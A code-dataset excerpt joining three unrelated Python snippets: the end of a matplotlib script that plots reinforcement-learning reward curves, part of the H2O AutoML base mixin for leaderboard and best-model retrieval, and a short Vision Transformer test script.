multi = [ multi[xx] for xx in range(len(multi)) if xx%20==0 ]
window_width= 100
cumsum_vec = np.cumsum(np.insert(multi, 0, 0))
multi = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agent_RSUppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
rsu = pickle.load(filehandle)
print("LEN rsu = ", len(rsu[0]))
rsu = rsu[0][:20000]
rsu = [ rsu[xx] for xx in range(len(rsu)) if xx%20==0 ]
window_width= 100
cumsum_vec = np.cumsum(np.insert(rsu, 0, 0))
rsu = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
print("LEN SINGLE = ", len(single))
print("LEN multi = ", len(multi))
print("LEN rsu = ", len(rsu))
x = np.arange(len(single))
times = range(len(single))
# plot our data along a line
fig,ax = plt.subplots()
ax.plot(times, single, '-', color='tab:blue', linestyle='dotted', marker='x' ,label='Single_agent')
ax.plot(times, multi, '-', color='tab:orange', linestyle='dashed', marker='D' ,label='Multi_agent')
ax.plot(times, rsu, '-', color='tab:red', linestyle='--', marker='2' ,label='Multi_agent_RSU')
ax.set_title('')
plt.xticks(np.arange(min(x), max(x)+1, 200)) # [2,2,2,2,2,2,2,2,2,2,2,2,2,2,2]
plt.xlabel('Epochs', size= 10)
ax.set_ylabel('Reward')
# create a confidence band of +/- 10% error
y_lower = [i - 0.1 * i for i in single]
y_upper = [i + 0.1 * i for i in single]
y_lower_multi = [i - 0.1 * i for i in multi]
y_upper_multi = [i + 0.1 * i for i in multi]
y_lower_rsu = [i - 0.1 * i for i in rsu]
y_upper_rsu= [i + 0.1 * i for i in rsu]
# plot our confidence band
ax.fill_between(times, y_lower, y_upper, alpha=0.2, color='tab:blue')
ax.fill_between(times, y_lower_multi, y_upper_multi, alpha=0.2, color='tab:orange')
ax.fill_between(times, y_lower_rsu, y_upper_rsu, alpha=0.2, color='tab:red')
print("min = ", min(x))
print("max = ", max(x))
print("len x = ", len(x))
plt.legend()
plt.grid()
plt.savefig('zz_reward_all.pdf')
plt.show()
#"""
| StarcoderdataPython |
17098 | import h2o
from h2o.base import Keyed
from h2o.exceptions import H2OValueError
from h2o.job import H2OJob
from h2o.model import ModelBase
from h2o.utils.typechecks import assert_is_type, is_type
class H2OAutoMLBaseMixin:
def predict(self, test_data):
"""
Predict on a dataset.
:param H2OFrame test_data: Data on which to make predictions.
:returns: A new H2OFrame of predictions.
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an H2OAutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
>>> aml.predict(test)
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
>>> get_aml.predict(test)
"""
return self.leader.predict(test_data)
# ---------------------------------------------------------------------------
# Download POJO/MOJO with AutoML
# ---------------------------------------------------------------------------
def download_pojo(self, path="", get_genmodel_jar=False, genmodel_name=""):
"""
Download the POJO for the leader model in AutoML to the directory specified by path.
If path is an empty string, then dump the output to screen.
:param path: An absolute path to the directory where POJO should be saved.
:param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
:param genmodel_name: Custom name of genmodel jar
:returns: name of the POJO file written.
"""
return h2o.download_pojo(self.leader, path, get_jar=get_genmodel_jar, jar_name=genmodel_name)
def download_mojo(self, path=".", get_genmodel_jar=False, genmodel_name=""):
"""
Download the leader model in AutoML in MOJO format.
:param path: the path where MOJO file should be saved.
:param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
:param genmodel_name: Custom name of genmodel jar
:returns: name of the MOJO file written.
"""
return ModelBase.download_mojo(self.leader, path, get_genmodel_jar, genmodel_name)
@property
def project_name(self):
"""
Retrieve a string indicating the project_name of the automl instance to retrieve.
:return: a string containing the project_name
"""
pass
@property
def leader(self):
"""
Retrieve the top model from an H2OAutoML object
:return: an H2O model
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Get the best model in the AutoML Leaderboard
>>> aml.leader
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Get the best model in the AutoML Leaderboard
>>> get_aml.leader
"""
pass
@property
def leaderboard(self):
"""
Retrieve the leaderboard from an H2OAutoML object
:return: an H2OFrame with model ids in the first column and evaluation metric in the second column sorted
by the evaluation metric
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Get the AutoML Leaderboard
>>> aml.leaderboard
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Get the AutoML Leaderboard
>>> get_aml.leaderboard
"""
pass
@property
def training_info(self):
"""
Expose the name/value columns of `event_log` as a simple dictionary, for example `start_epoch`, `stop_epoch`, ...
See :func:`event_log` to obtain a description of those key/value pairs.
:return: a dictionary with event_log['name'] column as keys and event_log['value'] column as values.
"""
pass
@property
def event_log(self):
"""
Retrieve the backend event log from an H2OAutoML object
:return: an H2OFrame with detailed events occurred during the AutoML training.
"""
pass
def get_leaderboard(self, extra_columns=None):
"""
Retrieve the leaderboard.
Contrary to the default leaderboard attached to the instance, this one can return columns other than the metrics.
:param extra_columns: a string or a list of string specifying which optional columns should be added to the leaderboard. Defaults to None.
Currently supported extensions are:
- 'ALL': adds all columns below.
- 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
- 'predict_time_per_row_ms`: column providing the average prediction time by the model for a single row.
- 'algo': column providing the algorithm name for each model.
:return: An H2OFrame representing the leaderboard.
:examples:
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> aml.train(y=y, training_frame=train)
>>> lb_all = aml.get_leaderboard('ALL')
>>> lb_custom = aml.get_leaderboard(['predict_time_per_row_ms', 'training_time_ms'])
>>> lb_custom_sorted = lb_custom.sort(by='predict_time_per_row_ms')
"""
assert isinstance(self, Keyed)
return _fetch_leaderboard(self.key, extra_columns)
def get_best_model(self, algorithm=None, criterion=None):
"""
Get best model of a given family/algorithm for a given criterion from an AutoML object.
:param algorithm: One of "basemodel", "deeplearning", "drf", "gbm", "glm", "stackedensemble", "xgboost".
If None, pick the best model regardless of the algorithm.
:param criterion: Criterion can be one of the metrics reported in leaderboard. If set to None, the same ordering
as in the leaderboard will be used.
Avaliable criteria:
- Regression metrics: deviance, rmse, mse, mae, rmsle
- Binomial metrics: auc, logloss, aucpr, mean_per_class_error, rmse, mse
- Multinomial metrics: mean_per_class_error, logloss, rmse, mse
The following additional leaderboard information can be also used as a criterion:
- 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
- 'predict_time_per_row_ms`: column providing the average prediction time by the model for a single row.
:return: An H2OModel or None if no model of a given family is present
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> gbm = aml.get_best_model("gbm")
"""
from h2o.exceptions import H2OValueError
def _get_models(leaderboard):
return [m[0] for m in
leaderboard["model_id"].as_data_frame(use_pandas=False, header=False)]
higher_is_better = ["auc", "aucpr"]
assert_is_type(algorithm, None, str)
assert_is_type(criterion, None, str)
if criterion is not None:
criterion = criterion.lower()
if "deviance" == criterion:
criterion = "mean_residual_deviance"
if algorithm is not None:
if algorithm.lower() not in ("basemodel", "deeplearning", "drf", "gbm",
"glm", "stackedensemble", "xgboost"):
raise H2OValueError("Algorithm \"{}\" is not supported!".format(algorithm))
algorithm = algorithm.lower()
extra_cols = ["algo"]
if criterion in ("training_time_ms", "predict_time_per_row_ms"):
extra_cols.append(criterion)
leaderboard = h2o.automl.get_leaderboard(self, extra_columns=extra_cols)
leaderboard = leaderboard if algorithm is None else (
leaderboard[leaderboard["algo"].tolower() == algorithm, :] if algorithm != "basemodel"
else leaderboard[leaderboard["algo"].tolower() != "stackedensemble", :])
if leaderboard.nrow == 0:
return None
if criterion is None:
return h2o.get_model(leaderboard[0, "model_id"])
if criterion not in leaderboard.columns:
raise H2OValueError("Criterion \"{}\" is not present in the leaderboard!".format(criterion))
models_in_default_order = _get_models(leaderboard)
sorted_lb = leaderboard.sort(by=criterion, ascending=criterion not in higher_is_better)
selected_models = _get_models(sorted_lb[sorted_lb[criterion] == sorted_lb[0, criterion]])
picked_model = [model for model in models_in_default_order if model in selected_models][0]
return h2o.get_model(picked_model)
def _fetch_leaderboard(aml_id, extensions=None):
assert_is_type(extensions, None, str, [str])
extensions = ([] if extensions is None
else [extensions] if is_type(extensions, str)
else extensions)
resp = h2o.api("GET /99/Leaderboards/%s" % aml_id, data=dict(extensions=extensions))
dest_key = resp['project_name'].split('@', 1)[0]+"_custom_leaderboard"
return _fetch_table(resp['table'], key=dest_key, progress_bar=False)
def _fetch_table(table, key=None, progress_bar=True):
try:
# Intentionally mask the progress bar here since showing multiple progress bars is confusing to users.
# If any failure happens, revert back to user's original setting for progress and display the error message.
ori_progress_state = H2OJob.__PROGRESS_BAR__
H2OJob.__PROGRESS_BAR__ = progress_bar
# Parse leaderboard H2OTwoDimTable & return as an H2OFrame
fr = h2o.H2OFrame(table.cell_values, destination_frame=key, column_names=table.col_header, column_types=table.col_types)
return h2o.assign(fr[1:], key) # removing index and reassign id to ensure persistence on backend
finally:
H2OJob.__PROGRESS_BAR__ = ori_progress_state
def _fetch_state(aml_id, properties=None, verbosity=None):
state_json = h2o.api("GET /99/AutoML/%s" % aml_id, data=dict(verbosity=verbosity))
project_name = state_json["project_name"]
if project_name is None:
raise H2OValueError("No AutoML instance with id {}.".format(aml_id))
leaderboard_list = [key["name"] for key in state_json['leaderboard']['models']]
leader_id = leaderboard_list[0] if (leaderboard_list is not None and len(leaderboard_list) > 0) else None
should_fetch = lambda prop: properties is None or prop in properties
leader = None
if should_fetch('leader'):
leader = h2o.get_model(leader_id) if leader_id is not None else None
leaderboard = None
if should_fetch('leaderboard'):
leaderboard = _fetch_table(state_json['leaderboard_table'], key=project_name+"_leaderboard", progress_bar=False)
event_log = None
if should_fetch('event_log'):
event_log = _fetch_table(state_json['event_log_table'], key=project_name+"_eventlog", progress_bar=False)
return dict(
project_name=project_name,
json=state_json,
leader_id=leader_id,
leader=leader,
leaderboard=leaderboard,
event_log=event_log,
)
| StarcoderdataPython |
1694552 | import torch
import pdb
import transformer
from transformer import VisionTransformer, VisionTransformerUpHead
from transformer import config
backbone_arg = config.model['backbone']
decode_head_arg = config.model['decode_head']
pdb.set_trace()
model = VisionTransformer(model_name='vit_large_patch16_384', **backbone_arg).to('cuda:1')
decoder_head = VisionTransformerUpHead(**decode_head_arg).to('cuda:1')
tmp = torch.rand((1,3,256,256), device='cuda:1')
output = model(tmp)
output_2 = decoder_head(output)
print(output[-1].shape)
print(output_2.shape) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.